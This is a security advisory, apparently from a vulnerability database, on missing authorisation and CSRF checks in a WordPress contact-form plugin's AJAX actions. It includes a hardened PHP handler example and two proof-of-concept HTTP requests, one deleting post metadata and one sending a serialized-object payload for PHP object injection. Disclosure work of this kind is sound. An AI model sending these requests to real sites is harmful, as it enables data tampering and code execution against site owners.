Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls
Description
The plugin has neither authorisation nor CSRF (nonce) checks in its delete_cf7_data and export_cf7_data AJAX actions, which are available to any authenticated user and could therefore be called by accounts with a role as low as subscriber. The delete_cf7_data action allows arbitrary post metadata deletion, and also PHP Object Injection if a suitable gadget chain is present in another plugin, because user-supplied data is passed to maybe_unserialize() without prior validation.
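For comparison, the three checks the description says are missing, written into a hardened admin-ajax delete handler. This is an added example, not the plugin's own code; the hook name cfadb_delete_data, the nonce action cfadb_delete, the manage_options capability and the meta-key whitelist are assumptions.

```php
<?php
// Added example (not the plugin's code): a hardened admin-ajax handler for a
// hypothetical delete action, with the authorisation, CSRF and input checks
// that delete_cf7_data/export_cf7_data were reported to lack.
// Assumed names: hook 'cfadb_delete_data', nonce action 'cfadb_delete',
// capability 'manage_options', and the whitelisted meta keys below.

// Only the authenticated hook is registered; no 'wp_ajax_nopriv_' variant.
add_action( 'wp_ajax_cfadb_delete_data', 'cfadb_handle_delete_data' );

function cfadb_handle_delete_data() {
    // 1. CSRF: verify the nonce the plugin's own JS sends in the 'nonce' field.
    //    The nonce is created server-side with wp_create_nonce( 'cfadb_delete' ).
    //    check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'cfadb_delete', 'nonce' );

    // 2. Authorisation: being logged in is not enough; a subscriber must be refused.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Input validation: accept only an integer post ID and a whitelisted key,
    //    so arbitrary keys such as _edit_lock cannot be targeted.
    $items        = ( isset( $_POST['data'] ) && is_array( $_POST['data'] ) ) ? $_POST['data'] : array();
    $allowed_keys = array( 'cfadb_submission', 'cfadb_attachment' ); // assumed plugin keys
    $deleted      = 0;

    foreach ( $items as $item ) {
        $post_id = isset( $item['id'] ) ? absint( $item['id'] ) : 0;
        $key     = isset( $item['key'] ) ? sanitize_key( $item['key'] ) : '';
        if ( ! $post_id || ! in_array( $key, $allowed_keys, true ) ) {
            continue;
        }
        // No request value is ever passed to maybe_unserialize()/unserialize():
        // the row is addressed by post ID and key only, which removes the
        // object-injection path entirely.
        if ( delete_post_meta( $post_id, $key ) ) {
            $deleted++;
        }
    }

    wp_send_json_success( array( 'deleted' => $deleted ) );
}
```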
Proof of Concept
To delete the _edit_lock metadata of the post ID 18:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock

To prove the object injection, we inserted a new class in the plugin file:

# class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}}

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=
Classification
Type
NO AUTHORISATION
Miscellaneous
Original Researcher
Quentin VILLAIN (3wsec)
Submitter
Quentin VILLAIN (3wsec)
Verified
Yes
Timeline
Publicly Published
2021-11-15
Added
2021-11-15
Last Updated
2022-04-12